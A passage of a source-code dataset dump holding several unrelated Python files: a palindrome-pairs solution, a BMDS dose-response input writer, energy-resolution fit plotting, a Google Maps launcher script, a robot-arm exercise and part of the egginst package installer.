dfs(c)\n dfs(curr)\n return indexes\n\nclass Solution(unittest.TestCase):\n def palindromePairs(self, words: List[str]) -> List[List[int]]:\n \"\"\"\nGiven a list of unique 
words, find all pairs of distinct indices (i, j) in the given list, so that the concatenation of the two words, i.e. words[i] + words[j] is a palindrome.\n\nExample 1:\n\nInput: [\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"]\nOutput: [[0,1],[1,0],[3,2],[2,4]]\nExplanation: The palindromes are [\"dcbaabcd\",\"abcddcba\",\"slls\",\"llssssll\"]\nExample 2:\n\nInput: [\"bat\",\"tab\",\"cat\"]\nOutput: [[0,1],[1,0]]\nExplanation: The palindromes are [\"battab\",\"tabbat\"]\n\n------\nBasic Idea: Use trie to store reversed words, when search word, match as much as possible.\n The unmatched part can still be pal, so that when meet any word in trie, count it in. And when either no more char in word or trie, don't stop\n\"\"\"\n trie = Trie()\n empties = []\n for i,w in enumerate(words):\n if not w:\n empties.append(i)\n else:\n # insert reverse of word\n trie.insert(w[::-1], i)\n\n cache = {}\n def isPal(word):\n if word in cache:\n return cache[word]\n l, r = 0, len(word)-1\n while l < r:\n if word[l] != word[r]:\n cache[word] = False\n return False\n l += 1\n r -= 1\n cache[word] = True\n return True\n\n res = []\n for i,w in enumerate(words):\n # if w is empty, essentially is check any other word is pal\n # if w is not empty, also check empties which essentially check if w is pal\n indexes = list(range(len(words))) if not w else trie.search(w) + empties\n for j in indexes:\n if j != i and isPal(w+words[j]):\n res.append([i,j])\n return res\n\n def test(self):\n self.assertCountEqual([[3,0],[1,3],[4,0],[2,4],[5,0],[0,5]], self.palindromePairs([\"a\",\"b\",\"c\",\"ab\",\"ac\",\"aa\"]))\n self.assertCountEqual([[0,1],[1,0]], self.palindromePairs([\"a\",\"\"]))\n self.assertCountEqual([[0,1],[1,0],[3,2],[2,4]], self.palindromePairs([\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"]))\n self.assertCountEqual([[0,1],[1,0]], self.palindromePairs([\"bat\",\"tab\",\"cat\"]))\n","sub_path":"src/main/python/palindrome_pairs.py","file_name":"palindrome_pairs.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"501084950","text":"import os\nimport inspect\nimport sys\n\nimport pytest\nscriptpath = \"../bmds/\"\n\n# Add the directory containing your module to the Python path (wants absolute paths)\nsys.path.append(os.path.abspath(scriptpath))\nimport bmds\n\n\n\"\"\"\n@pytest.fixture\ndef dataset():\n return bmds.ContinuousDataset(\n doses=[0, 10, 50, 150, 400],\n ns=[111, 142, 143, 93, 42],\n responses=[2.112, 2.095, 1.956, 1.587, 1.254],\n stdevs=[0.235, 0.209, 0.231, 0.263, 0.159])\n\"\"\"\n\nModel_name = \"NCTR\"\nUser_notes = \"BMDS NCTR model, ...\"\nInput_file_name = \"NCTR.(D)\"\nOutput_file_name = \"NCTR.OUT\"\nN_obs = 39 # [5] number of observations\nN_dose_groups = 4 # [5a] number of dose groups\n\nMax_iter = 500 # [6a] Maximum # of iterations\nRel = 1.00e-8 # [6b] Rel Function Convergence\nPara_conv = 1.00e-8 # [6c] Parameter Convergence\nCurve = 0 # 7 BMDL Curve Calculation\nRestrict = 1 # 8 Restrict Power\nCalculation = 1 # 9 BMD Calculation\nF_size = 0 # 10 fixed size\n\nAppend = 0 # [11] Append or Overwrite Output File\nSmooth = 0 # [12] Smooth Option\nBMR = 0.100 # [13] BMR (BMR level)\nRisk = 0 # [14] Risk Type\nConfidence = 0.95 # [15] Confidence Level\n\nBootstrap = 1000 # [16] Bootstrap Iterations\nSeed = 0 # [17] Seed\nAlpha = -9999 # [18] Alpha Parameter, [28]\nRho = -9999 # [19] Rho Parameter, [29]\nBeta = -9999 # [20] Beta Parameter, [30]\n\nTheta1 = -9999 # [21] Theta1 Parameter, [31]\nTheta2 = 
-9999 # [22] Theta2 Parameter, [32]\nPhi1 = -9999 # [23] Phi1 Parameter, [33]\nPhi2 = -9999 # [24] Phi2 Parameter, [34]\nPhi3 = -9999 # [25] Phi3 Parameter, [35]\nPhi4 = -9999 # [26] Phi4 Parameter, [36]\nInit = 0 # [27] Initialize Parameters\n#\n#\n#\n\n\n\"\"\"\n# [37] Dose Name\n# [38] Response Name\n# [39] Constant String: NEGATIVE_RESPONSE\n# [40] Litter Specific Covariate\n# [41] Column 5 name\n\n\"\"\"\ndoses=[0, 25, 50, 100]\nsample_size=[111, 142, 143, 93, 42]\nresponses=[2.112, 2.095, 1.956, 1.587, 1.254]\nstdevs=[0.235, 0.209, 0.231, 0.263, 0.159]\n\nf = open('NCTR.(D)', 'w')\n\n\nf.write(Model_name + '\\n')\nf.write(User_notes + '\\n')\nf.write(Input_file_name + '\\n')\nf.write(Output_file_name + '\\n')\nf.write(str(N_obs) + \" \" + str(N_dose_groups) + '\\n')\nf.write(str(Max_iter) + \" \" + str(Rel) + \" \" + str(Para_conv) + \" \" + str(Curve) + \" \" + str(Restrict) + \" \")\nf.write(str(Calculation) + \" \" + str(F_size) + \" \" + str(Append) + \" \" + str(Smooth) + '\\n')\nf.write(str(BMR) + \" \" + str(Risk) + \" \" + str(Confidence) + \" \" + str(Bootstrap) + \" \" + str(Seed) + '\\n')\nf.write(str(Alpha) + \" \" + str(Rho) + \" \" + str(Beta) + \" \" + str(Theta1) + \" \" + str(Theta2) + '\\n')\nf.write(str(Phi1) + \" \" + str(Phi2) + \" \" + str(Phi3) + \" \" + str(Phi4) + '\\n')\nf.write(str(Init) + '\\n')\nf.write(str(Alpha) + \" \" + str(Rho) + \" \" + str(Beta) + \" \" + str(Theta1) + \" \" + str(Theta2) + '\\n')\nf.write(str(Phi1) + \" \" + str(Phi2) + \" \" + str(Phi3) + \" \" + str(Phi4) + '\\n')\n\nf.write(\"Dose Resp Negative_Resp Covariate Dose_Group\" + '\\n')\nf.write(str(doses[0]) + \" 1 15 16 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 1 8 9 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 13 15 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 3 11 14 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 3 10 13 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 0 9 9 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 8 10 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 12 14 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 1 9 10 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 9 11 -9999\" + '\\n')\n\nf.write(str(doses[1]) + \" 4 10 14 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 5 4 9 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 6 8 14 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 2 7 9 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 6 7 13 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 3 9 12 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 1 9 10 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 2 8 10 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 3 11 14 -9999\" + '\\n')\n\nf.write(str(doses[2]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 6 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 9 14 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 5 10 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 5 10 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 6 9 15 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 2 5 7 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 4 10 14 -9999\" + '\\n')\n\nf.write(str(doses[3]) + \" 6 5 11 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 6 8 14 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 8 4 12 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 7 6 13 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 8 4 12 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 6 8 14 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 6 5 11 -9999\" + 
'\\n')\nf.write(str(doses[3]) + \" 5 3 8 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 4 6 10 -9999\" + '\\n')\n\nf.close()\nexit()\n\ndef test_executable_path():\n\n parents = (\n bmds.Dichotomous,\n bmds.DichotomousCancer,\n bmds.Continuous,\n )\n\n for name, obj in inspect.getmembers(bmds):\n if inspect.isclass(obj):\n if obj not in parents and issubclass(obj, parents):\n exe = obj.get_exe_path()\n print(obj.__name__, exe)\n assert os.path.exists(exe)\n\n\n@pytest.mark.skipif(sys.platform != \"win32\",\n reason='BMDS can only be executed on Windows')\ndef test_execute(dataset):\n model = bmds.Logistic_213(dataset)\n model.execute()\n assert model.output_created is True\n","sub_path":"D-files/NCTR.py","file_name":"NCTR.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"157207237","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom invisible_cities.core.core_functions import shift_to_bin_centers\n\n\ndef gaussC(x, mu, sigma, N, Ny):\n return N * np.exp(-0.5 *np.power((x - mu)/(sigma),2)) + Ny\n\ndef gauss(x, mu, sigma, N):\n return N * np.exp(-0.5 * np.power((x - mu)/(sigma),2))\n\n\ndef poisson_sigma(x, default=3):\n \"\"\"\n Get the uncertainty of x (assuming it is poisson-distributed).\n Set *default* when x is 0 to avoid null uncertainties.\n \"\"\"\n u = x**0.5\n u[x==0] = default\n return u\n\ndef plot_residuals_E_reso_gaussC(plots_dir, label, energy, e_nbins, e_range, mu, mu_u , sigma, sigma_u, N, N_u, N2,N2_u, chi2_val):\n\n resolution = 235*sigma/mu\n\n sns.set()\n sns.set_style(\"white\")\n sns.set_style(\"ticks\")\n\n fig = plt.figure(figsize=(9,7))\n\n global_linewidth = 2\n global_linecolor = \"r\"\n\n # compute y values from histogram\n e_bins = np.linspace(* e_range , e_nbins + 1)\n entries, e = np.histogram(energy, e_bins)\n e = shift_to_bin_centers(e)\n #e_u = np.diff(e)[0] * 0.5\n entries_u = poisson_sigma(entries)\n #entries_u = entries**0.5\n\n # compute bin width\n w= (e_range[1]- e_range[0])/e_nbins\n\n # compute residuals\n y_from_fit = gaussC(e, mu, sigma, N*w, N2*w )\n residuals = (y_from_fit - entries)/ entries_u\n y_from_fit_1 = gauss(e, mu, sigma, N*w)\n y_from_fit_2 = N2*w\n\n # Plot\n frame_data = plt.gcf().add_axes((.1, .3,.8, .6))\n\n plt.errorbar (e, entries, entries_u, 0, \"p\", c=\"k\", label = 'data')\n plt.plot (e, y_from_fit, lw=global_linewidth, color=global_linecolor, label = 'fit' )\n plt.fill_between(e, y_from_fit_1, 0, alpha=0.3, color='')\n plt.fill_between(e, y_from_fit_2, 0, alpha=0.5, color='pink')\n plt.legend( loc='upper right', numpoints = 1 )\n\n\n textstr = '\\n'.join((\n '$\\mu={:.2f} \\pm {:.2f} $' .format(mu,mu_u),\n '$\\sigma 1={:.2f} \\pm {:.2f}$' .format(sigma, sigma_u),\n '$N 1={:.2f} \\pm {:.2f}$' .format(N, N_u),\n '$N 2={:.2f} \\pm {:.2f}$' .format(N2, N2_u),\n '$\\sigma_E/E = {:.2f} \\% $' .format(resolution,),\n f'$\\chi^2 = {chi2_val:.2f}$'\n ))\n\n\n\n props = dict(boxstyle='square', facecolor='white', alpha=0.5)\n plt.gca().text(0.05, 0.95, textstr, transform=plt.gca().transAxes, fontsize=14,\n verticalalignment='top', bbox=props)\n frame_data.set_xticklabels([])\n\n plt.ylabel(\"Entries\")\n plt.ylim(-10)\n\n # set my own xlimits\n #lims = plt.xlim()\n lims = plt.xlim(e_range[0], e_range[1])\n frame_res = plt.gcf().add_axes((.1, .1, .8, .2))\n plt.plot (lims, [0,0], \"-g\", lw=0.7) # linia en 00 verde\n plt.errorbar(e, residuals, 1, 0, linestyle='None', fmt='|', c=\"k\")\n 
plt.ylim(-3.9,3.9)\n plt.xlim(e_range[0], e_range[1])\n plt.xlabel(\"E (pes)\")\n #plt.show()\n\n #fix: add save as option\n #plt.savefig(f'{plots_dir}/fit_energy_reso_{label}.png')\n #print('plots saved in '+ plots_dir)\n\n return resolution, fig\n","sub_path":"plotting_functions.py","file_name":"plotting_functions.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"304223656","text":"#! python3\n# mapIt.py\n\nimport webbrowser, sys#, pyperclip\n\nimport subprocess\nsubprocess.call(['pip3', 'install', 'pyperclip'])\ntry:\n import pyperclip\nexcept:\n print(\">>> Error during pyperclip import operation. <<<\" )\n\n# if sys.argv has more than just filename\nif len(sys.argv) > 1:\n # Get address from commad line.\n print(sys.argv) # ['mapIt.py', '...', '...']\n address = \" \".join(sys.argv[1:])\n print(address)\n\nelse:\n # Get the addres from the clipboard\n print(\">>> The address hasn't been provided. <<<\")\n try:\n address = pyperclip.paste()\n except:\n print(\">>> Error during pyperclip .paste() operation. <<<\" )\n print(\"\\n______________________________________________\\n\\n\\\n Providing ERandom address\\n\\\n Jana Pawla II 207\\n\\\n Bialy Dunajec 34-425\\\n \\n______________________________________________\")\n address = \"Jana Pawla II 207 Bialy Dunajec 34-425\"\n\nwebbrowser.open('https://www.google.com/maps/place/' + address)\n","sub_path":"automate_boring_stuff/mapIt.py","file_name":"mapIt.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"460745756","text":"from RobotArm import RobotArm\n\n\nrobotArm = RobotArm('exercise 9')\nrobotArm.speed = 5\n# Jouw python instructies zet je vanaf hier:\n\nfor stapelBlokken in range(1, 5):\n for i in range(stapelBlokken):\n robotArm.grab()\n\n for moveRight in range(5):\n robotArm.moveRight()\n\n robotArm.drop()\n\n for moveLeft in range(5):\n robotArm.moveLeft()\n \n robotArm.moveRight()\n\n \n\n\n# Na jouw code wachten tot het sluiten van de window:\nrobotArm.wait()","sub_path":"robotarm-python-2021-main/oefening9 - kopie.py","file_name":"oefening9 - kopie.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"302288929","text":"# Author: Ilan Schnell \n\"\"\"\\\negginst is a simple tool for installing and uninstalling eggs. Example:\n\n egginst nose-1.3.0-1.egg\n\nThis tool is simple and does not care if the eggs it installs are for the\ncorrect platform, its dependencies installed, etc... You should generally use\nenpkg or Canopy's package manager instead to deal with dependencies correctly.\n\"\"\"\nfrom __future__ import absolute_import, print_function\n\nimport argparse\nimport json\nimport logging\nimport os\nimport posixpath\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport warnings\n\nfrom os.path import abspath, basename, dirname, join, isdir, isfile, normpath, sep\n\ntry:\n import appinst\nexcept ImportError: # pragma: no cover\n appinst = None\n\nfrom . import eggmeta\nfrom . import object_code\nfrom . 
import scripts\n\nfrom .links import create_link\nfrom .progress import console_progress_manager_factory\nfrom .utils import (on_win, bin_dir_name, rel_site_packages, ensure_dir,\n rm_empty_dir, rm_rf, get_executable, is_zipinfo_dir,\n zip_has_arcname)\nfrom ._zipfile import ZipFile\n\nfrom .vendor.six import StringIO\nfrom .vendor.six.moves import configparser\n\nEGG_INFO = \"EGG-INFO\"\nBOOTSTRAP_ARCNAME = EGG_INFO + \"/spec/__bootstrap__.py\"\n\nR_EGG_INFO = re.compile(\"^{0}\".format(EGG_INFO))\nR_EGG_INFO_BLACK_LIST = re.compile(\n \"^{0}/(usr|spec|PKG-INFO.bak|prefix|.gitignore|\"\n \"inst|post_egginst.py|pre_egguninst.py)\".format(EGG_INFO))\nR_LEGACY_EGG_INFO = re.compile(\"(^.+.egg-info)\")\n\nPY_PAT = re.compile(r'^(.+)\\.py(c|o)?$')\nSO_PAT = re.compile(r'^lib.+\\.so')\nPY_OBJ = '.pyd' if on_win else '.so'\n\nlogger = logging.getLogger(__name__)\n\n\ndef name_version_fn(fn):\n \"\"\"\n Given the filename of a package, returns a tuple(name, version).\n \"\"\"\n if fn.endswith('.egg'):\n fn = fn[:-4]\n if '-' in fn:\n return tuple(fn.split('-', 1))\n else:\n return fn, ''\n\n\ndef is_in_legacy_egg_info(f, is_custom_egg):\n \"\"\"\n Filter out files in legacy egg-info directory, i.e. for eggs as follows:\n\n package/__init__.py\n EGG-INFO/...\n package.egg-info/...\n\n filter out the content of package.egg-info. Only a few eggs were produced\n as above. This version of enstaller will simply copy the required content\n from EGG-INFO where setuptools expects it.\n \"\"\"\n if is_custom_egg:\n if R_LEGACY_EGG_INFO.search(f):\n return True\n else:\n return False\n else:\n return False\n\n\ndef should_copy_in_egg_info(f, is_custom_egg):\n \"\"\"\n Return True if the given archive name needs to be copied in to\n $site-packages/$package_egg_info\n \"\"\"\n if R_EGG_INFO.search(f):\n if is_custom_egg:\n if R_EGG_INFO_BLACK_LIST.search(f):\n return False\n else:\n return True\n else:\n return True\n else:\n return False\n\n\ndef has_legacy_egg_info_format(arcnames, is_custom_egg):\n if is_custom_egg:\n for name in arcnames:\n if R_LEGACY_EGG_INFO.search(name):\n return True\n return False\n else:\n return False\n\n\ndef should_mark_executable(arcname, fn):\n if os.path.islink(fn):\n return False\n if (arcname.startswith(('EGG-INFO/usr/bin/', 'EGG-INFO/scripts/')) or\n fn.endswith(('.dylib', '.pyd', '.so')) or\n (arcname.startswith('EGG-INFO/usr/lib/') and\n SO_PAT.match(fn))):\n return True\n else:\n return False\n\n\ndef should_skip(zp, arcname):\n m = PY_PAT.match(arcname)\n if m and zip_has_arcname(zp, m.group(1) + PY_OBJ):\n # .py, .pyc, .pyo next to .so are not written\n return True\n else:\n return False\n\n\ndef setuptools_egg_info_dir(path):\n \"\"\"\n Return the .egg-info directory name as created/expected by setuptools\n \"\"\"\n filename = basename(path)\n name, version = name_version_fn(filename)\n return \"{0}-{1}.egg-info\".format(name, version)\n\n\ndef install_app(meta_dir, prefix):\n return _install_app_impl(meta_dir, prefix, remove=False)\n\n\ndef remove_app(meta_dir, prefix):\n return _install_app_impl(meta_dir, prefix, remove=True)\n\n\ndef _install_app_impl(meta_dir, prefix, remove=False):\n if appinst is None:\n return\n\n path = join(meta_dir, eggmeta.APPINST_PATH)\n if not isfile(path):\n return\n\n if remove:\n handler = appinst.uninstall_from_dat\n warning = 'uninstalling application item'\n else:\n handler = appinst.install_from_dat\n warning = 'installing application item'\n\n try:\n try:\n handler(path, prefix)\n except TypeError:\n # Old appinst (<= 2.1.1) did 
not handle the prefix argument (2d\n # arg)\n handler(path)\n except Exception as e:\n logger.warn(\"Warning ({0}):\\n{1!r}\".format(warning, e))\n\n\ndef _run_script(meta_dir, fn, prefix):\n path = join(meta_dir, fn)\n if not isfile(path):\n return\n subprocess.call([scripts.executable, '-E', path, '--prefix', prefix],\n cwd=dirname(path))\n\n\nclass _EggInstRemove(object):\n\n def __init__(self, path, prefix=sys.prefix, noapp=False):\n self.path = path\n self.fn = basename(path)\n name, version = name_version_fn(self.fn)\n self.cname = name.lower()\n self.prefix = abspath(prefix)\n self.noapp = noapp\n\n self.egginfo_dir = join(self.prefix, 'EGG-INFO')\n self.meta_dir = join(self.egginfo_dir, self.cname)\n\n self._files = None\n self._installed_size = None\n\n @property\n def is_installed(self):\n return isdir(self.meta_dir)\n\n @property\n def files(self):\n if self._files is None:\n self._read_uninstall_metadata()\n return self._files\n\n @property\n def installed_size(self):\n if self._installed_size is None:\n self._read_uninstall_metadata()\n return self._installed_size\n\n def _read_uninstall_metadata(self):\n d = read_meta(self.meta_dir)\n\n self._files = [join(self.prefix, f) for f in d['files']]\n self._installed_size = d['installed_size']\n\n def _rm_dirs(self, files):\n dir_paths = set()\n len_prefix = len(self.prefix)\n for path in set(dirname(p) for p in files):\n while len(path) > len_prefix:\n dir_paths.add(path)\n path = dirname(path)\n\n for path in sorted(dir_paths, key=len, reverse=True):\n if not path.rstrip(sep).endswith('site-packages'):\n rm_empty_dir(path)\n\n def remove_iterator(self):\n \"\"\"\n Create an iterator that will remove every installed file.\n\n Example::\n\n from egginst.console import ProgressManager\n\n progress = ProgressManager(...)\n egginst = EggInst(...)\n\n with progress:\n for i, filename in self.remove_iterator():\n print(\"removing file {0}\".format(filename))\n progress(step=i)\n \"\"\"\n if not self.is_installed:\n logger.error(\"Error: Can't find meta data for: {0!r}\".\n format(self.cname))\n return\n\n if not self.noapp:\n remove_app(self.meta_dir, self.prefix)\n _run_script(self.meta_dir, 'pre_egguninst.py', self.prefix)\n\n for n, p in enumerate(self.files):\n n += 1\n\n rm_rf(p)\n if p.endswith('.py'):\n rm_rf(p + 'c')\n rm_rf(p + 'o')\n\n yield p\n\n self._rm_dirs(self.files)\n rm_rf(self.meta_dir)\n rm_empty_dir(self.egginfo_dir)\n\n def remove(self):\n for filename in self.remove_iterator():\n pass\n\n\nclass EggInst(object):\n\n def __init__(self, path, prefix=sys.prefix, hook=False, pkgs_dir=None,\n noapp=False):\n self.path = path\n self.fn = basename(path)\n name, version = name_version_fn(self.fn)\n self.cname = name.lower()\n self.prefix = abspath(prefix)\n self.noapp = noapp\n\n self.bin_dir = join(self.prefix, bin_dir_name)\n\n if self.prefix != abspath(sys.prefix):\n scripts.executable = get_executable(self.prefix)\n\n self.site_packages = join(self.prefix, rel_site_packages)\n self.pyloc = self.site_packages\n self.egginfo_dir = join(self.prefix, 'EGG-INFO')\n self.meta_dir = join(self.egginfo_dir, self.cname)\n\n self.meta_json = join(self.meta_dir, 'egginst.json')\n self.files = []\n\n self._egginst_remover = _EggInstRemove(path, prefix, noapp)\n self._installed_size = None\n self._files_to_install = None\n\n @property\n def installed_size(self):\n \"\"\"\n Return the size (bytes) of the extracted egg.\n \"\"\"\n if self._installed_size is None:\n with ZipFile(self.path) as zp:\n self._installed_size = 
sum(zp.getinfo(name).file_size for name\n in zp.namelist())\n return self._installed_size\n\n def iter_files_to_install(self):\n return self._lines_from_arcname('EGG-INFO/inst/files_to_install.txt')\n\n def iter_targets(self):\n return self._lines_from_arcname('EGG-INFO/inst/targets.dat')\n\n def _should_create_info(self):\n for arcname in ('EGG-INFO/spec/depend', 'EGG-INFO/info.json'):\n if zip_has_arcname(self.z, arcname):\n return True\n return False\n\n def pre_extract(self):\n if not isdir(self.meta_dir):\n os.makedirs(self.meta_dir)\n\n def post_extract(self, extra_info=None):\n with ZipFile(self.path) as zp:\n self.z = zp\n\n if on_win:\n scripts.create_proxies(self)\n else:\n # XXX: we ignore placeholder hack for enstaller, to avoid error\n # messages related to tests data when updating enstaller\n # (enstaller test data contain some osx/linux binaries)\n if self.cname != \"enstaller\":\n object_code.apply_placeholder_hack(self.files,\n list(self.iter_targets()),\n self.prefix)\n\n self._create_links()\n\n self._entry_points()\n if self._should_create_info():\n eggmeta.create_info(self, extra_info)\n\n scripts.fix_scripts(self)\n\n if not self.noapp:\n install_app(self.meta_dir, self.prefix)\n\n self._write_meta()\n\n _run_script(self.meta_dir, 'post_egginst.py', self.prefix)\n\n def install(self, extra_info=None):\n for currently_extracted_size in self.install_iterator():\n pass\n\n def _create_links(self):\n \"\"\"\n Given the content of the EGG-INFO/inst/files_to_install.txt file,\n create/remove the links listed therein.\n \"\"\"\n for line in self.iter_files_to_install():\n arcname, link = line.split()\n if link == 'False':\n continue\n self.files.append(create_link(arcname, link, self.prefix))\n\n def _entry_points(self):\n lines = list(self._lines_from_arcname('EGG-INFO/entry_points.txt',\n ignore_empty=False))\n if lines == []:\n return\n conf = configparser.ConfigParser()\n data = u'\\n'.join(lines) + '\\n'\n # XXX: hack to workaround 2.6-specific bug with ConfigParser and\n # unicode.\n if sys.version_info < (2, 7, 3):\n conf.readfp(StringIO(data.encode(\"utf8\")))\n else:\n conf.readfp(StringIO(data))\n if ('console_scripts' in conf.sections() or\n 'gui_scripts' in conf.sections()):\n logger.debug('creating scripts')\n scripts.create(self, conf)\n\n def _rel_prefix(self, path):\n return abspath(path).replace(self.prefix, '.').replace('\\\\', '/')\n\n def _write_meta(self):\n d = dict(\n egg_name=self.fn,\n prefix=self.prefix,\n installed_size=self.installed_size,\n files=[self._rel_prefix(p)\n if abspath(p).startswith(self.prefix) else p\n for p in self.files + [self.meta_json]]\n )\n with open(self.meta_json, 'w') as f:\n json.dump(d, f, indent=2, sort_keys=True)\n\n def _lines_from_arcname(self, arcname, ignore_empty=True):\n if zip_has_arcname(self.z, arcname):\n for line in self.z.read(arcname).decode(\"utf8\").splitlines():\n line = line.strip()\n if ignore_empty and line == '':\n continue\n if line.startswith('#'):\n continue\n yield line\n\n def install_iterator(self, extra_info=None):\n \"\"\"\n Create an iterator that will iterate over each archive to be extracted.\n\n Example::\n\n from egginst.console import ProgressManager\n\n progress = ProgressManager(...)\n egginst = EggInst(...)\n\n with progress:\n for n in self.install_iterator():\n progress(step=n)\n \"\"\"\n self.pre_extract()\n\n with ZipFile(self.path) as zp:\n self.z = zp\n\n arcnames = self.z.namelist()\n is_custom_egg = eggmeta.is_custom_egg(self.path)\n\n use_legacy_egg_info_format = 
has_legacy_egg_info_format(arcnames,\n is_custom_egg)\n\n for arcname in arcnames:\n if use_legacy_egg_info_format:\n n = self._extract_egg_with_legacy_egg_info(arcname,\n is_custom_egg)\n else:\n n = self._extract(arcname, is_custom_egg)\n yield n\n\n self.post_extract(extra_info)\n\n def _extract_egg_with_legacy_egg_info(self, name, is_custom_egg):\n zip_info = self.z.getinfo(name)\n\n if is_in_legacy_egg_info(name, is_custom_egg):\n self._write_legacy_egg_info_metadata(zip_info)\n else:\n self._write_arcname(name)\n\n return zip_info.file_size\n\n def _extract(self, name, is_custom_egg):\n zip_info = self.z.getinfo(name)\n\n self._write_arcname(name)\n if should_copy_in_egg_info(name, is_custom_egg):\n self._write_standard_egg_info_metadata(zip_info)\n\n return zip_info.file_size\n\n def _write_legacy_egg_info_metadata(self, zip_info):\n if is_zipinfo_dir(zip_info):\n return\n\n name = zip_info.filename\n m = R_LEGACY_EGG_INFO.search(name)\n if m:\n legacy_egg_info_dir = m.group(1)\n from_egg_info = posixpath.relpath(name, legacy_egg_info_dir)\n\n dest = join(self.pyloc, setuptools_egg_info_dir(self.path),\n from_egg_info)\n self._write_egg_info_arcname(name, dest)\n else:\n msg = (\"BUG: Unexpected name for legacy egg info in {0}: {1}\".\n format(self.fn, name))\n raise ValueError(msg)\n\n def _write_standard_egg_info_metadata(self, zip_info):\n if is_zipinfo_dir(zip_info):\n return\n\n name = zip_info.filename\n from_egg_info = posixpath.relpath(name, EGG_INFO)\n dest = posixpath.join(self.pyloc, setuptools_egg_info_dir(self.path),\n from_egg_info)\n\n self._write_egg_info_arcname(name, dest)\n\n def _write_egg_info_arcname(self, name, dest):\n ensure_dir(dest)\n source = self.z.open(name)\n try:\n with open(dest, \"wb\") as target:\n shutil.copyfileobj(source, target)\n self.files.append(dest)\n finally:\n source.close()\n\n def _get_dst(self, arcname):\n def _transform_path(arcname, egg_prefix, dest_prefix):\n return abspath(join(dest_prefix, arcname[len(egg_prefix):]))\n\n if on_win:\n scheme = [\n (\"EGG-INFO/prefix/\", self.prefix),\n (\"EGG-INFO/scripts/\", self.bin_dir),\n (\"EGG-INFO/\", self.meta_dir),\n ]\n else:\n scheme = [\n (\"EGG-INFO/prefix/\", self.prefix),\n (\"EGG-INFO/usr/\", self.prefix),\n (\"EGG-INFO/scripts/\", self.bin_dir),\n (\"EGG-INFO/\", self.meta_dir),\n ]\n\n for prefix, dest in scheme:\n if arcname.startswith(prefix):\n return _transform_path(arcname, prefix, dest)\n return _transform_path(arcname, \"\", self.pyloc)\n\n def _write_arcname(self, arcname):\n if arcname.endswith('/') or arcname.startswith('.unused'):\n return\n\n if should_skip(self.z, arcname):\n return\n\n path = self._get_dst(arcname)\n destination = os.path.relpath(path, self.prefix)\n\n self.z.extract_to(arcname, destination, self.prefix)\n self.files.append(path)\n\n if should_mark_executable(arcname, path):\n os.chmod(path, 0o755)\n\n def remove(self):\n return self._egginst_remover.remove()\n\n def remove_iterator(self):\n return self._egginst_remover.remove_iterator()\n\n\ndef read_meta(meta_dir):\n meta_json = join(meta_dir, 'egginst.json')\n if isfile(meta_json):\n with open(meta_json) as fp:\n return json.load(fp)\n return None\n\n\ndef get_installed(prefix=sys.prefix):\n \"\"\"\n Generator returns a sorted list of all installed packages.\n Each element is the filename of the egg which was used to install the\n package.\n \"\"\"\n egg_info_dir = join(prefix, 'EGG-INFO')\n if not isdir(egg_info_dir):\n return\n pat = re.compile(r'([a-z0-9_.]+)$')\n for fn in 
